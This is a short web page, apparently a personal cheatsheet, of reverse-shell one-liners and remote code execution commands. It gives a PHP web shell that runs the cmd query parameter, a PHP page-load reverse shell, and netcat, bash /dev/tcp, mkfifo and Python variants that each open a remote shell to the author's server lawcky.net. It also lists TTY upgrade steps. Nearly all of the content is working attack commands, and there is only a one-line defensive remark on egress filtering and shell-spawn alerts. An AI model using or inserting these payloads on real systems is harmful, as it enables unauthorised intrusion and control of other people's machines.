Last updated: 9 Oct 24 12:32:50 (UTC)


RCE Utility

This is a cheatsheet of reverse-shell one-liners and related remote code execution (RCE) commands.

main source in case you need more

Upgrading to full TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'

or

script /dev/null -qc /bin/bash

Press CTRL-Z to suspend the shell, then run stty raw -echo && fg to bring it back to the foreground.

Note: if the terminal crashes, type the reset command directly and press Enter.

export TERM=xterm-256color


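Executing a reverse shell. In the examples below, HOST = lawcky.net (the author's own server) and PORT = 51951, except the second PHP snippet, which uses port 4444. Every variant works the same way: the target opens an outbound TCP connection and attaches a shell's stdin, stdout and stderr to it. Outbound (egress) filtering, and alerts on a web server or interpreter process spawning /bin/sh or bash with a network socket as its standard streams, are what catch them.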


PHP

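To inject into a web page (executed server-side when the page is requested). The first snippet passes the cmd query parameter straight to system(); the second starts a reverse shell when the page is loaded: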

<?php system($_GET['cmd']); ?>

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc lawcky.net 4444 >/tmp/f"); ?>

To execute from a command line:

php -r '$sock=fsockopen("lawcky.net",51951);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("lawcky.net",51951);shell_exec("/bin/sh -i <&3 >&3 2>&3");'


Netcat

nc -e /bin/sh lawcky.net 51951

nc -e /bin/bash lawcky.net 51951

nc -c bash lawcky.net 51951


SHELL

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc lawcky.net 51951 >/tmp/f

BASH

bash -i >& /dev/tcp/lawcky.net/51951 0>&1

/bin/bash -l > /dev/tcp/lawcky.net/51951 0<&1 2>&1

bash -c 'bash -i >& /dev/tcp/lawcky.net/51951 0>&1'


Python

export RHOST="lawcky.net";export RPORT=51951;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("lawcky.net",51951));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("lawcky.net",51951));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'